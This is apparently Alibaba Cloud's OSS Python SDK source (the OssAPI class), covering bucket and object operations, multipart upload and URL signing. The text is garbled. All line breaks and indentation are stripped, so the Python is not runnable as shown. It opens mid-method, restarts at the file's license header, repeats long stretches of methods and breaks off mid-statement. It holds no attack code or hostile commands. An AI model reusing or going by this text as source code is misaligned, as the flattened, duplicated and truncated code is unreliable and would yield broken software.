:type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = 
object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp.seek(os.SEEK_SET, os.SEEK_END) filesize = fp.tell() fp.seek(os.SEEK_SET) conn = self._open_conn_to_put_object(bucket, object, filesize, content_type, headers, params) totallen = 0 l = fp.read(self.SendBufferSize) retry_times = 0 while len(l) > 0: if retry_times > 100: print "retry too many times" raise try: conn.send(l) retry_times = 0 except: retry_times += 1 continue totallen += len(l) if self.show_bar: self.view_bar(totallen, filesize) l = fp.read(self.SendBufferSize) res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_fp(bucket, tmp_object, fp, content_type, tmp_headers, tmp_params) return res def get_object(self, bucket, object, headers=None, params=None): ''' Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' body = '' return self.http_request(method, bucket, object, headers, body, params) def get_object_to_file(self, bucket, object, filename, headers=None): ''' Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' res = self.get_object(bucket, object, headers) totalread = 0 if res.status / 100 == 2: header = {} header = convert_header2map(res.getheaders()) filesize = safe_get_element("content-length", header) f = file(filename, 'wb') data = '' while True: data = res.read(self.RecvBufferSize) if data: f.write(data) totalread += len(data) if self.show_bar: self.view_bar(totalread, filesize) else: break f.close() # TODO: get object with flow return res def delete_object(self, bucket, object, headers=None): ''' Delete object :type bucket: 
string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'DELETE' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def head_object(self, bucket, object, headers=None): ''' Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'HEAD' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def post_object_group(self, bucket, object, object_group_msg_xml, headers=None, params=None): ''' Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response ''' method = 'POST' if not headers: headers = {} if not params: params = {} if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type body = object_group_msg_xml params['group'] = '' headers['Content-Length'] = str(len(body)) return self.http_request(method, bucket, object, headers, body, params) def get_object_group_index(self, bucket, object, headers=None): ''' Get object group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers["x-oss-file-group"] = '' method = 'GET' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def upload_part_from_file_given_pos(self, bucket, object, filename, offset, partsize, upload_id, part_number, 
headers=None, params=None): if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file_given_pos(bucket, object, filename, offset, partsize, content_type, headers, params) def put_object_from_file_given_pos(self, bucket, object, filename, offset, partsize, content_type='', headers=None, params=None): ''' Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp = open(filename, 'rb') if offset > os.path.getsize(filename): fp.seek(os.SEEK_SET, os.SEEK_END) else: fp.seek(offset) if not content_type: content_type = get_content_type_by_filename(filename) conn = self._open_conn_to_put_object(bucket, object, partsize, content_type, headers, params) left_len = partsize while True: if left_len <= 0: break elif left_len < self.SendBufferSize: buffer_content = fp.read(left_len) else: buffer_content = fp.read(self.SendBufferSize) if buffer_content: conn.send(buffer_content) left_len = left_len - len(buffer_content) fp.close() res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_file_given_pos(bucket, tmp_object, filename, offset, partsize , content_type, tmp_headers, tmp_params) return res def upload_large_file(self, bucket, object, filename, thread_num=10, max_part_num=1000, headers=None): ''' Upload large file, the 
content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response ''' #split the large file into 1000 parts or many parts #get part_msg_list if not headers: headers = {} if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num retry_times = self.retry_times while(retry_times >= 0): try: threadpool = [] for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = PutObjectGroupWorker(oss, bucket, filename, part_msg_list[begin:end], self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times = retry_times -1 if -1 >= retry_times: print "after retry %s, failed, upload large file failed!" 
% retry_times return #get xml string that contains msg of object group object_group_msg_xml = create_object_group_msg_xml(part_msg_list) content_type = get_content_type_by_filename(filename) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') if not headers.has_key('Content-Type'): headers['Content-Type'] = content_type return self.post_object_group(bucket, object, object_group_msg_xml, headers) def copy_object(self, source_bucket, source_object, target_bucket, target_object, headers=None): ''' Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if isinstance(source_object, unicode): source_object = source_object.encode('utf-8') source_object = urllib.quote(source_object) headers['x-oss-copy-source'] = "/%s/%s" % (source_bucket, source_object) method = 'PUT' body = '' params = {} return self.http_request(method, target_bucket, target_object, headers, body, params) def init_multi_upload(self, bucket, object, headers=None, params=None): ''' Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'POST' body = '' params['uploads'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_all_parts(self, bucket, object, upload_id, max_parts=None, part_number_marker=None): ''' List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response ''' method = 'GET' headers = {} body = '' params = {} params['uploadId'] = upload_id if max_parts: params['max-parts'] = max_parts if part_number_marker: 
params['part-number-marker'] = part_number_marker return self.http_request(method, bucket, object, headers, body, params) def get_all_multipart_uploads(self, bucket, delimiter=None, max_uploads=None, key_marker=None, prefix=None, upload_id_marker=None, headers=None): ''' List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['uploads'] = '' if delimiter: params['delimiter'] = delimiter if max_uploads: params['max-uploads'] = max_uploads if key_marker: params['key-marker'] = key_marker if prefix: params['prefix'] = prefix if upload_id_marker: params['upload-id-marker'] = upload_id_marker return self.http_request(method, bucket, object, headers, body, params) def upload_part(self, bucket, object, filename, upload_id, part_number, headers=None, params=None): ''' Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file(bucket, object, filename, content_type, headers, params) def upload_part_from_string(self, bucket, object, data, upload_id, part_number, headers=None, params=None): ''' Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response 
''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' fp = StringIO.StringIO(data) return self.put_object_from_fp(bucket, object, fp, content_type, headers, params) def complete_upload(self, bucket, object, upload_id, part_msg_xml, headers=None, params=None): ''' Finish multiupload and merge all the parts in part_msg_xml as a object. :type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' body = part_msg_xml headers['Content-Length'] = str(len(body)) params['uploadId'] = upload_id if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type return self.http_request(method, bucket, object, headers, body, params) def cancel_upload(self, bucket, object, upload_id, headers=None, params=None): ''' Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'DELETE' if isinstance(upload_id, unicode): upload_id = upload_id.encode('utf-8') params['uploadId'] = upload_id body = '' return self.http_request(method, bucket, object, headers, body, params) def multi_upload_file(self, bucket, object, filename, upload_id='', thread_num=10, max_part_num=10000, headers=None, params=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. 
:type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response ''' #get init upload_id if not upload_id: res = self.init_multi_upload(bucket, object, headers, params) body = res.read() if res.status == 200: h = GetInitUploadIdXml(body) upload_id = h.upload_id else: err = ErrorXml(body) raise Exception("%s, %s" %(res.status, err.msg)) if not upload_id: raise Exception("-1, Cannot get upload id.") #split the large file into 1000 parts or many parts #get part_msg_list if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) logger = getlogger(self.debug) logger.info("bucket:%s, object:%s, upload_id is: %s, split_number:%d" % (bucket, object, upload_id, len(part_msg_list))) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num #list part to get a map upload_retry_times = self.retry_times while(upload_retry_times >= 0): uploaded_part_map = {} oss = OssAPI(self.host, self.access_id, self.secret_access_key) uploaded_part_map = get_part_map(oss, bucket, object, upload_id) retry_times = self.retry_times while(retry_times >= 0): threadpool = [] try: for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = UploadPartWorker(oss, bucket, object, upload_id, filename, part_msg_list[begin:end], uploaded_part_map, self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times -= 1 if -1 >= retry_times: raise Exception("-2, after retry %s, failed, multi upload part 
failed! upload_id:%s" % (self.retry_times, upload_id)) #get xml string that contains msg of part part_msg_xml = create_part_xml(part_msg_list) #complete upload res = self.complete_upload(bucket, object, upload_id, part_msg_xml, headers, params) if res.status == 200: break upload_retry_times -= 1 if upload_retry_times < 0: raise Exception("-3, after retry %s, failed, multi upload file failed! upload_id:%s" % (self.retry_times, upload_id)) return res def delete_objects(self, bucket, object_list=None, headers=None, params=None): ''' Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) return self.batch_delete_object(bucket, object_list_xml, headers, params) def batch_delete_object(self, bucket, object_list_xml, headers=None, params=None): ''' Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' object = '' body = object_list_xml headers['Content-Length'] = str(len(body)) params['delete'] = '' base64md5 = base64.encodestring(md5.new(body).digest()) if base64md5[-1] == '\n': base64md5 = base64md5[0:-1] headers['Content-MD5'] = base64md5 return self.http_request(method, bucket, object, headers, body, params) def list_objects(self, bucket, prefix=''): ''' :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix ''' get_instance = GetAllObjects() marker_input = '' object_list = [] oss = OssAPI(self.host, self.access_id, self.secret_access_key) (object_list, 
marker_output) = get_instance.get_object_in_bucket(oss, bucket, marker_input, prefix) return object_list def batch_delete_objects(self, bucket, object_list=None): ''' :type bucket: string :param: :type object_list: object name list :param: Returns: True or False ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) try: res = self.batch_delete_object(bucket, object_list_xml) if res.status / 100 == 2: return True except: pass return False def get_object_info(self, bucket, object, headers=None, params=None): ''' Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'GET' body = '' params['objectInfo'] = '' return self.http_request(method, bucket, object, headers, body, params)
#!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
import httplib import time import base64 import urllib import StringIO import sys try: from oss.oss_util import * except: from oss_util import * try: from oss.oss_xml_handler import * except: from oss_xml_handler import * class OssAPI: ''' A simple OSS API ''' DefaultContentType = 'application/octet-stream' provider = PROVIDER __version__ = '0.3.2' Version = __version__ AGENT = 'oss-python%s (%s)' % (__version__, sys.platform) def __init__(self, host, access_id, secret_access_key='', port=80, is_security=False): self.SendBufferSize = 8192 self.RecvBufferSize = 1024*1024*10 self.host = get_second_level_domain(host) self.port = port self.access_id = access_id self.secret_access_key = secret_access_key self.show_bar = False self.is_security = is_security self.retry_times = 5 self.agent = self.AGENT self.debug = False def set_debug(self, is_debug): if is_debug: self.debug = True def set_retry_times(self, retry_times=5): self.retry_times = retry_times def set_send_buf_size(self, buf_size): try: self.SendBufferSize = (int)(buf_size) except ValueError: pass def set_recv_buf_size(self, buf_size): try: self.RecvBufferSize = (int)(buf_size) except ValueError: pass def get_connection(self, tmp_host=None): host = '' port = 80 timeout = 10 if not tmp_host: tmp_host = self.host host_port_list = tmp_host.split(":") if len(host_port_list) == 1: host = host_port_list[0].strip() elif len(host_port_list) == 2: host = host_port_list[0].strip() port = int(host_port_list[1].strip()) if self.is_security or port == 443: self.is_security = True if sys.version_info >= (2, 6): return httplib.HTTPSConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPSConnection(host=host, port=port) else: if sys.version_info >= (2, 6): return httplib.HTTPConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPConnection(host=host, port=port) def sign_url_auth_with_expire_time(self, method, url, headers=None, resource="/", timeout=60, params=None): ''' Create the 
authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value sign_url = append_param(url, params) return sign_url def sign_url(self, method, bucket, object, timeout=60, headers=None, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. 
''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/%s%s" % (bucket, object, get_resource(params)) auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value url = '' if self.is_security: if is_ip(self.host): url = "https://%s/%s/%s" % (self.host, bucket, object) else: url = "https://%s.%s/%s" % (bucket, self.host, object) else: if is_ip(self.host): url = "http://%s/%s/%s" % (self.host, bucket, object) else: url = "http://%s.%s/%s" % (bucket, self.host, object) sign_url = append_param(url, params) return sign_url def _create_sign_for_normal_auth(self, method, headers=None, resource="/"): ''' NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. 
:type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string ''' auth_value = "%s %s:%s" % (self.provider, self.access_id, get_assign(self.secret_access_key, method, headers, resource, None, self.debug)) return auth_value def bucket_operation(self, method, bucket, headers=None, params=None): return self.http_request(method, bucket, '', headers, '', params) def object_operation(self, method, bucket, object, headers=None, body='', params=None): return self.http_request(method, bucket, object, headers, body, params) def http_request(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' retry = 5 res = None while retry > 0: retry -= 1 tmp_bucket = bucket tmp_object = object tmp_headers = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() tmp_params = {} if params and isinstance(params, dict): tmp_params = params.copy() res = self.http_request_with_redirect(method, tmp_bucket, tmp_object, tmp_headers, body, tmp_params) if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) else: return res return res def http_request_with_redirect(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' if not params: params = {} if not headers: headers = {} if isinstance(object, unicode): object = object.encode('utf-8') if not bucket: resource = "/" 
headers['Host'] = self.host else: headers['Host'] = "%s.%s" % (bucket, self.host) resource = "/%s/" % bucket resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if is_ip(self.host): url = "/%s/%s" % (bucket, object) if not bucket: url = "/%s" % object headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) headers['Date'] = date headers['Authorization'] = self._create_sign_for_normal_auth(method, headers, resource) headers['User-Agent'] = self.agent if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.request(method, url, body, headers) return conn.getresponse() def get_service(self, headers=None): ''' List all buckets of user ''' return self.list_all_my_buckets(headers) def list_all_my_buckets(self, headers=None): ''' List all buckets of user type headers: dict :param Returns: HTTP Response ''' method = 'GET' bucket = '' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def get_bucket_acl(self, bucket): ''' Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response ''' method = 'GET' object = '' headers = {} body = '' params = {} params['acl'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket_location(self, bucket): ''' Get Location of bucket ''' method = 'GET' object = '' headers = {} body = '' params = {} params['location'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket ''' return self.list_bucket(bucket, prefix, marker, delimiter, maxkeys, headers) def list_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object 
that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['prefix'] = prefix params['marker'] = marker params['delimiter'] = delimiter params['max-keys'] = maxkeys return self.http_request(method, bucket, object, headers, body, params) def create_bucket(self, bucket, acl='', headers=None): ''' Create bucket ''' return self.put_bucket(bucket, acl, headers) def put_bucket(self, bucket, acl='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl method = 'PUT' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_bucket_with_location(self, bucket, acl='', location='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl params = {} body = '' if location != '': body = r'<CreateBucketConfiguration>' body += r'<LocationConstraint>' body += location body += r'</LocationConstraint>' body += r'</CreateBucketConfiguration>' method = 'PUT' object = '' return self.http_request(method, bucket, object, headers, body, params) def delete_bucket(self, bucket, headers=None): ''' Delete bucket :type bucket: string :param Returns: HTTP Response ''' method = 'DELETE' object = '' body = '' params = {} return self.http_request(method, 
bucket, object, headers, body, params) def put_object_with_data(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content ''' return self.put_object_from_string(bucket, object, input_content, content_type, headers, params) def put_object_from_string(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers['Content-Type'] = content_type headers['Content-Length'] = str(len(input_content)) fp = StringIO.StringIO(input_content) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def _open_conn_to_put_object(self, bucket, object, filesize, content_type=DefaultContentType, headers=None, params=None): ''' NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection ''' if not params: params = {} if not headers: headers = {} method = 'PUT' if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/" % bucket if not bucket: resource = "/" resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if bucket: headers['Host'] = "%s.%s" % (bucket, self.host) else: headers['Host'] = self.host if is_ip(self.host): url = "/%s/%s" % (bucket, object) headers['Host'] = self.host url = 
append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.putrequest(method, url) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') headers["Content-Type"] = content_type headers["Content-Length"] = filesize headers["Date"] = date headers["Expect"] = "100-Continue" headers['User-Agent'] = self.agent for k in headers.keys(): conn.putheader(str(k), str(headers[k])) if '' != self.secret_access_key and '' != self.access_id: auth = self._create_sign_for_normal_auth(method, headers, resource) conn.putheader("Authorization", auth) conn.endheaders() return conn def put_object_from_file(self, bucket, object, filename, content_type='', headers=None, params=None): ''' put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' fp = open(filename, 'rb') if not content_type: content_type = get_content_type_by_filename(filename) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def view_bar(self, num=1, sum=100): rate = float(num) / float(sum) rate_num = int(rate * 100) print '\r%d%% ' % (rate_num), sys.stdout.flush() def put_object_from_fp(self, bucket, object, fp, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = 
object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp.seek(os.SEEK_SET, os.SEEK_END) filesize = fp.tell() fp.seek(os.SEEK_SET) conn = self._open_conn_to_put_object(bucket, object, filesize, content_type, headers, params) totallen = 0 l = fp.read(self.SendBufferSize) retry_times = 0 while len(l) > 0: if retry_times > 100: print "retry too many times" raise try: conn.send(l) retry_times = 0 except: retry_times += 1 continue totallen += len(l) if self.show_bar: self.view_bar(totallen, filesize) l = fp.read(self.SendBufferSize) res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_fp(bucket, tmp_object, fp, content_type, tmp_headers, tmp_params) return res def get_object(self, bucket, object, headers=None, params=None): ''' Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' body = '' return self.http_request(method, bucket, object, headers, body, params) def get_object_to_file(self, bucket, object, filename, headers=None): ''' Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' res = self.get_object(bucket, object, headers) totalread = 0 if res.status / 100 == 2: header = {} header = convert_header2map(res.getheaders()) filesize = safe_get_element("content-length", header) f = file(filename, 'wb') data = '' while True: data = res.read(self.RecvBufferSize) if data: f.write(data) totalread += len(data) if self.show_bar: self.view_bar(totalread, filesize) else: break f.close() # TODO: get object with flow return res def delete_object(self, bucket, object, headers=None): ''' Delete object :type bucket: 
string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'DELETE' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def head_object(self, bucket, object, headers=None): ''' Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'HEAD' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def post_object_group(self, bucket, object, object_group_msg_xml, headers=None, params=None): ''' Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response ''' method = 'POST' if not headers: headers = {} if not params: params = {} if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type body = object_group_msg_xml params['group'] = '' headers['Content-Length'] = str(len(body)) return self.http_request(method, bucket, object, headers, body, params) def get_object_group_index(self, bucket, object, headers=None): ''' Get object group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers["x-oss-file-group"] = '' method = 'GET' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def upload_part_from_file_given_pos(self, bucket, object, filename, offset, partsize, upload_id, part_number, 
headers=None, params=None): if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file_given_pos(bucket, object, filename, offset, partsize, content_type, headers, params) def put_object_from_file_given_pos(self, bucket, object, filename, offset, partsize, content_type='', headers=None, params=None): ''' Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp = open(filename, 'rb') if offset > os.path.getsize(filename): fp.seek(os.SEEK_SET, os.SEEK_END) else: fp.seek(offset) if not content_type: content_type = get_content_type_by_filename(filename) conn = self._open_conn_to_put_object(bucket, object, partsize, content_type, headers, params) left_len = partsize while True: if left_len <= 0: break elif left_len < self.SendBufferSize: buffer_content = fp.read(left_len) else: buffer_content = fp.read(self.SendBufferSize) if buffer_content: conn.send(buffer_content) left_len = left_len - len(buffer_content) fp.close() res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return 